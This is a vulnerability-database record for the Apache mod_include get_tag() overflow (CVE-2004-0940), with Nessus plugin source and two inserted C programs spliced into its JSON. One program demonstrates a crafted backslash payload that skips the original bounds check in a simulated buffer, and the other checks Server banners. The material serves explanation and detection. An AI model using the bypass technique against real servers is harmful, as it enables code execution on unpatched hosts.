http://www.securiteam.com/unixfocus/6A00P15BFG.html\n[CVE-2004-0940](https://vulners.com/cve/CVE-2004-0940)\n", "modified": "2004-10-21T04:20:22", "published": "2004-10-21T04:20:22", "id": "OSVDB:11003", "href": "https://vulners.com/osvdb/OSVDB:11003", "title": "Apache HTTP Server mod_include get_tag() Function Local Overflow", "type": "osvdb", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2016-09-26T17:26:38", "edition": 1, "description": "The following package needs to be updated: apache+ipv6", "published": "2004-11-23T00:00:00", "type": "nessus", "title": "FreeBSD : apache mod_include 
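The OSVDB entry above quotes the get_tag() loop and the one-line workaround (`if (t - tag >= tagbuf_len-1)`) but does not show why the original `==` check is skippable or what the workaround buys. The following C program is an added example written for this page; it is not Apache code and not the exploit by xCrZx. It re-implements the string-reading loop over an in-memory buffer instead of a FILE*, with the tag limit set to 8 bytes (an assumption chosen for the demonstration) and a backing buffer large enough that the vulnerable modes can run past the limit without corrupting anything. Three bounds checks are selectable: the original one, the OSVDB workaround, and a stricter variant of my own that reserves room for the two-byte `\x` write plus the NUL. The payloads are constructed inputs: a run of `\a` pairs, with or without one leading plain byte to change the parity of `t - tag`.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define TAGBUF_LEN 8   /* assumed tag limit for the demonstration */

/* Which bounds check the loop uses; the loop body is the same for all three. */
enum check_mode {
    CHECK_ORIGINAL, /* t - tag == tagbuf_len      (Apache 1.3.x up to 1.3.32)        */
    CHECK_OSVDB,    /* t - tag >= tagbuf_len - 1  (workaround quoted in the OSVDB entry) */
    CHECK_STRICT    /* t - tag + 2 >= tagbuf_len  (this example's own check: room for a
                                                   two-byte "\x" write plus the NUL)   */
};

struct result { long stored; int truncated; };

/* Re-implementation of the get_tag() quoted-string loop on a memory buffer.
 * 'tag' must have 'backing_len' bytes so the vulnerable modes can overrun the
 * logical 'tagbuf_len' limit without touching memory they do not own; the
 * caller inspects the return value (bytes stored before the NUL) instead.
 * Returns -1 if the input ends before the terminator (GET_CHAR's EOF path). */
static long read_quoted(const char *in, char term, char *tag, size_t tagbuf_len,
                        size_t backing_len, enum check_mode mode, int *truncated)
{
    char *t = tag;
    *truncated = 0;
    for (;;) {
        char c = *in++;
        if (c == '\0') return -1;
        size_t used = (size_t)(t - tag);
        int stop = 0;
        switch (mode) {
        case CHECK_ORIGINAL: stop = (used == tagbuf_len);      break;
        case CHECK_OSVDB:    stop = (used >= tagbuf_len - 1);  break;
        case CHECK_STRICT:   stop = (used + 2 >= tagbuf_len);  break;
        }
        if (stop) { *t = '\0'; *truncated = 1; return (long)used; }
        if (c == '\\') {
            *(t++) = c;                 /* [2] first write of this iteration */
            c = *in++;
            if (c == '\0') return -1;
            if (c == term) *(--t) = c;  /* [3] "\"" collapses to the terminator */
        } else if (c == term) {
            break;
        }
        *(t++) = c;                     /* [4] second (or only) write; with [2] this
                                           advances t by 2, stepping over '==' */
        assert((size_t)(t - tag) + 1 < backing_len);  /* simulation guard only */
    }
    *t = '\0';
    return (long)(t - tag);
}

/* Constructed payload: optional leading plain byte, then 'pairs' copies of "\a",
 * then the closing quote. The leading byte makes t - tag odd so it never equals 8. */
static void build_payload(char *out, size_t outsz, int lead, size_t pairs)
{
    size_t i = 0;
    if (lead) out[i++] = 'x';
    for (size_t k = 0; k < pairs && i + 3 < outsz; k++) {
        out[i++] = '\\';
        out[i++] = 'a';
    }
    out[i++] = '"';
    out[i] = '\0';
}

/* Runs one check mode against the constructed payload and reports what was stored. */
static struct result run_mode(enum check_mode mode, int lead, size_t pairs)
{
    char payload[128];
    char tag[256];   /* 8-byte logical buffer with slack for the simulation */
    struct result r;
    build_payload(payload, sizeof payload, lead, pairs);
    memset(tag, 0, sizeof tag);
    r.stored = read_quoted(payload, '"', tag, TAGBUF_LEN, sizeof tag, mode, &r.truncated);
    return r;
}

/* The legitimate purpose of the backslash branch: "ab\"c" must decode to ab"c. */
static int collapses_escaped_quote(void)
{
    char tag[256];
    int truncated;
    long n = read_quoted("ab\\\"c\"", '"', tag, TAGBUF_LEN, sizeof tag, CHECK_STRICT, &truncated);
    return n == 4 && strcmp(tag, "ab\"c") == 0;
}

int main(void)
{
    static const char *names[] = { "original", "osvdb-workaround", "strict" };
    for (int m = 0; m < 3; m++)
        for (int lead = 0; lead <= 1; lead++) {
            struct result r = run_mode((enum check_mode)m, lead, 20);
            printf("%-17s lead=%d stored=%ld truncated=%d (limit %d)\n",
                   names[m], lead, r.stored, r.truncated, TAGBUF_LEN);
        }
    printf("escaped quote decodes correctly: %d\n", collapses_escaped_quote());
    return 0;
}
```

With the original check and a leading plain byte, `t - tag` runs 0, 1, 3, 5, 7, 9, ... and never equals 8, so all 41 payload bytes are stored against an 8-byte limit; without the leading byte the same input stops at exactly 8. The OSVDB workaround stops at 7 for the odd-aligned input, but for the even-aligned one the pair starting at offset 6 still advances to 8 before the check fires, so the terminating NUL lands at index 8; whether that matters depends on how the caller sizes `tag`, which this page does not show. The stricter check bounds the worst case of two bytes plus NUL up front, at the cost of truncating one byte early when the last slot would have held a plain character.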
buffer overflow vulnerability (11)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2011-10-03T00:00:00", "id": "FREEBSD_APACHE_1333_MOD_INCLUDE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=15797", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_6e6a6b8a2fde11d9b3a20050fc56d258.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(15797);\n script_version(\"$Revision: 1.9 $\");\n script_cve_id(\"CVE-2004-0940\");\n\n script_name(english:\"FreeBSD : apache mod_include buffer overflow vulnerability (11)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: apache+ipv6');\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://bugs.libgd.org/?do=details&task_id=70\nhttp://bugs.libgd.org/?do=details&task_id=87\nhttp://bugs.libgd.org/?do=details&task_id=89\nhttp://bugs.libgd.org/?do=details&task_id=92\nhttp://bugs.libgd.org/?do=details&task_id=94\nhttp://www.bugzilla.org/security/2.18.1/\nhttp://www.frsirt.com/english/advisories/2007/2336\nhttp://www.libgd.org/ReleaseNote020035\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html\nhttp://www.mozilla.org/security/announce/mfsa2005-46.html\nhttp://www.mozilla.org/security/announce/mfsa2005-47.html\nhttp://www.securitylab.ru/48807.html\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=292544');\nscript_set_attribute(attribute:'see_also', value: 
'http://www.FreeBSD.org/ports/portaudit/6e6a6b8a-2fde-11d9-b3a2-0050fc56d258.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/11/23\");\n script_cvs_date(\"$Date: 2011/10/03 00:48:24 $\");\n script_end_attributes();\n script_summary(english:\"Check for apache+ipv6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #37841 (freebsd_pkg_6e6a6b8a2fde11d9b3a20050fc56d258.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=6;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"apache<1.3.33\");\n\npkg_test(pkg:\"apache+mod_ssl<1.3.32+2.8.21_1\");\n\npkg_test(pkg:\"apache+mod_ssl+ipv6<1.3.32+2.8.21_1\");\n\npkg_test(pkg:\"apache+mod_perl<=1.3.31\");\n\npkg_test(pkg:\"apache+ipv6<1.3.33\");\n\npkg_test(pkg:\"apache+ssl<=1.3.29.1.55\");\n\npkg_test(pkg:\"ru-apache<1.3.33+30.21\");\n\npkg_test(pkg:\"ru-apache+mod_ssl<1.3.33+30.21+2.8.22\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-09-14T13:15:28", "description": "The remote web server appears to be running a version of Apache that\nis older than version 1.3.33.\n\nThis version is vulnerable to a local buffer overflow in the get_tag()\nfunction of the module 'mod_include' when a specially crafted document\nwith malformed server-side includes is requested though an HTTP\nsession.\n\nSuccessful exploitation can lead to execution of arbitrary code with\nescalated privileges, but requires that server-side includes (SSI) is\nenabled.", "edition": 18, "published": "2004-10-25T00:00:00", "title": "Apache mod_include get_tag() Function 
Local Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2004-10-25T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_MOD_INCLUDE_PRIV_ESCALATION.NASL", "href": "https://www.tenable.com/plugins/nessus/15554", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15554);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\"CVE-2004-0940\");\n script_bugtraq_id(11471);\n script_xref(name:\"RHSA\", value:\"2005:816\");\n script_xref(name:\"Secunia\", value:\"12898\");\n script_xref(name:\"Secunia\", value:\"19073\");\n\n script_name(english:\"Apache mod_include get_tag() Function Local Overflow\");\n script_summary(english:\"Checks for version of Apache\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a local buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server appears to be running a version of Apache that\nis older than version 1.3.33.\n\nThis version is vulnerable to a local buffer overflow in the get_tag()\nfunction of the module 'mod_include' when a specially crafted document\nwith malformed server-side includes is requested though an HTTP\nsession.\n\nSuccessful exploitation can lead to execution of arbitrary code with\nescalated privileges, but requires that server-side includes (SSI) is\nenabled.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apache 1.3.33 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/10/25\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2004-2020 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n\n script_dependencie(\"http_version.nasl\", \"os_fingerprint.nasl\", \"macosx_SecUpd20041202.nasl\");\n script_require_keys(\"www/apache\", \"Settings/ParanoidReport\"); \n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"backport.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif ( get_kb_item(\"CVE-2004-0940\") ) exit(0);\n\nport = get_http_port(default:80, embedded:TRUE);\nif(!port)exit(0);\nif(!get_port_state(port))exit(0);\n\nbanner = get_backport_banner(banner:get_http_banner(port: port));\nif(!banner)exit(0);\n\nserv = strstr(banner, \"Server\");\nif(ereg(pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/(1\\.([0-2]\\.|3\\.([0-9][^0-9]|[0-2][0-9]|3[0-2])))\", string:serv))\n {\n security_warning(port);\n exit(0);\n }\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:03:07", "description": "Two vulnerabilities have been identified in the Apache 1.3 webserver :\n\n - CAN-2004-0940\n 'Crazy Einstein' has discovered a vulnerability in the\n 'mod_include' module, which can cause a buffer to be\n overflown and could lead to the execution of arbitrary\n code.\n\n - NO VULN ID\n\n Larry Cashdollar has discovered a potential buffer\n overflow in the htpasswd 
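The Nessus plugin above decides from the Server banner alone whether a host runs an Apache older than 1.3.33. The C program below is an added example, not part of this page or of Tenable's plugin: it parses the product token the plugin's regex accepts (including Mandrake's `Apache-AdvancedExtranetServer`), compares the version numerically against 1.3.33, and returns an explicit "unknown" verdict when the banner carries no version. The sample banners are constructed for the example; the Debian 1.3.26 line illustrates why the plugin consults backport.inc, since a distribution that backports the fix keeps the old version string.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Verdicts from check_server_banner(). */
enum { BANNER_UNKNOWN = -1, BANNER_FIXED = 0, BANNER_VULNERABLE = 1 };

typedef struct {
    int major, minor, patch;
    int found;              /* 0 when the banner carries no Apache/x.y.z token */
} apache_version;

/* Reads a run of decimal digits at *s. Returns 0 if none are present. */
static int read_number(const char **s, int *out)
{
    const char *p = *s;
    int n = 0;
    if (!isdigit((unsigned char)*p)) return 0;
    while (isdigit((unsigned char)*p)) {
        n = n * 10 + (*p - '0');
        p++;
    }
    *s = p;
    *out = n;
    return 1;
}

/* Extracts the version from a Server header line. Like the Nessus regex it
 * also accepts Mandrake's "Apache-AdvancedExtranetServer/x.y.z" token. A bare
 * "Apache" (ServerTokens Prod) or an unrelated product such as Tomcat's
 * "Apache-Coyote/1.1" yields found=0: no version, no verdict. */
static apache_version parse_server_banner(const char *line)
{
    apache_version v = {0, 0, 0, 0};
    const char *p = strstr(line, "Apache");
    if (!p) return v;
    p += strlen("Apache");
    if (strncmp(p, "-AdvancedExtranetServer", 23) == 0) p += 23;
    if (*p != '/') return v;
    p++;
    if (!read_number(&p, &v.major)) return v;
    if (*p != '.') return v;
    p++;
    if (!read_number(&p, &v.minor)) return v;
    if (*p == '.') {            /* patch level is optional in some banners */
        p++;
        if (!read_number(&p, &v.patch)) return v;
    }
    v.found = 1;
    return v;
}

/* Numeric comparison against the first fixed release, 1.3.33. Everything on
 * the 1.x line below it is flagged, matching the plugin's regex; 2.x is
 * outside this CVE's scope, as in the regex. */
static int check_server_banner(const char *line)
{
    apache_version v = parse_server_banner(line);
    if (!v.found) return BANNER_UNKNOWN;
    if (v.major != 1) return BANNER_FIXED;
    if (v.minor < 3) return BANNER_VULNERABLE;
    if (v.minor == 3 && v.patch < 33) return BANNER_VULNERABLE;
    return BANNER_FIXED;
}

int main(void)
{
    /* Constructed Server header lines, not captured from a real host. */
    const char *banners[] = {
        "Server: Apache/1.3.31 (Unix)",
        "Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22",
        "Server: Apache-AdvancedExtranetServer/1.3.29",
        "Server: Apache/1.3.26 (Unix) Debian GNU/Linux", /* woody: fix backported, banner unchanged */
        "Server: Apache",                                 /* ServerTokens Prod hides the version */
        "Server: Apache/2.0.52 (Fedora)",
    };
    size_t i;
    for (i = 0; i < sizeof banners / sizeof banners[0]; i++)
        printf("%-48s -> %d\n", banners[i], check_server_banner(banners[i]));
    return 0;
}
```

A verdict of 1 from a banner is only a lead: Debian woody's 1.3.26-0woody6, Mandrake's 1.3.31-7.1.101mdk and the other distribution builds listed on this page carry the fix under a pre-1.3.33 version string, so confirm with the package version or a local check before reporting.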
utility, which could be\n exploited when user-supplied is passed to the program\n via a CGI (or PHP, or ePerl, ...) program.", "edition": 26, "published": "2004-11-17T00:00:00", "title": "Debian DSA-594-1 : apache - buffer overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2004-11-17T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:apache"], "id": "DEBIAN_DSA-594.NASL", "href": "https://www.tenable.com/plugins/nessus/15729", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-594. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15729);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0940\");\n script_xref(name:\"DSA\", value:\"594\");\n\n script_name(english:\"Debian DSA-594-1 : apache - buffer overflows\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities have been identified in the Apache 1.3 webserver :\n\n - CAN-2004-0940\n 'Crazy Einstein' has discovered a vulnerability in the\n 'mod_include' module, which can cause a buffer to be\n overflown and could lead to the execution of arbitrary\n code.\n\n - NO VULN ID\n\n Larry Cashdollar has discovered a potential buffer\n overflow in the htpasswd utility, which could be\n exploited when user-supplied is passed to the program\n via a CGI (or PHP, or ePerl, ...) 
program.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-594\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache packages.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 1.3.26-0woody6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/17\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"apache\", reference:\"1.3.26-0woody6\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"apache-common\", reference:\"1.3.26-0woody6\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"apache-dev\", reference:\"1.3.26-0woody6\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"apache-doc\", 
reference:\"1.3.26-0woody6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:23", "description": "A possible buffer overflow exists in the get_tag() function of\nmod_include, and if SSI (Server Side Includes) are enabled, a local\nattacker may be able to run arbitrary code with the rights of an httpd\nchild process. This could be done with a special HTML document using\nmalformed SSI.\n\nThe updated packages have been patched to prevent this problem.", "edition": 24, "published": "2004-11-17T00:00:00", "title": "Mandrake Linux Security Advisory : apache (MDKSA-2004:134)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2004-11-17T00:00:00", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:10.1", "p-cpe:/a:mandriva:linux:apache-modules", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "p-cpe:/a:mandriva:linux:apache-devel", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:apache-source", "p-cpe:/a:mandriva:linux:apache"], "id": "MANDRAKE_MDKSA-2004-134.NASL", "href": "https://www.tenable.com/plugins/nessus/15739", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:134. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15739);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0940\");\n script_xref(name:\"MDKSA\", value:\"2004:134\");\n\n script_name(english:\"Mandrake Linux Security Advisory : apache (MDKSA-2004:134)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A possible buffer overflow exists in the get_tag() function of\nmod_include, and if SSI (Server Side Includes) are enabled, a local\nattacker may be able to run arbitrary code with the rights of an httpd\nchild process. This could be done with a special HTML document using\nmalformed SSI.\n\nThe updated packages have been patched to prevent this problem.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache-1.3.29-1.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache-devel-1.3.29-1.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache-modules-1.3.29-1.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache-source-1.3.29-1.3.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.1\", reference:\"apache-1.3.31-7.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache-devel-1.3.31-7.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache-modules-1.3.31-7.1.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"apache-source-1.3.31-7.1.101mdk\", yank:\"mdk\")) 
flag++;\n\nif (rpm_check(release:\"MDK9.2\", reference:\"apache-1.3.28-3.4.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache-devel-1.3.28-3.4.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache-modules-1.3.28-3.4.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache-source-1.3.28-3.4.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:45:21", "description": "There is a buffer overflow in a function used by mod_include that may\nenable a local user to gain privileges of a httpd child. Only users\nthat are able to create SSI documents can take advantage of that\nvulnerability.", "edition": 25, "published": "2009-04-23T00:00:00", "title": "FreeBSD : apache mod_include buffer overflow vulnerability (6e6a6b8a-2fde-11d9-b3a2-0050fc56d258)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2009-04-23T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6", "p-cpe:/a:freebsd:freebsd:ru-apache", "p-cpe:/a:freebsd:freebsd:apache+mod_perl", "p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:apache+ipv6", "p-cpe:/a:freebsd:freebsd:apache+ssl", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl", "p-cpe:/a:freebsd:freebsd:apache"], "id": "FREEBSD_PKG_6E6A6B8A2FDE11D9B3A20050FC56D258.NASL", "href": "https://www.tenable.com/plugins/nessus/37841", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) 
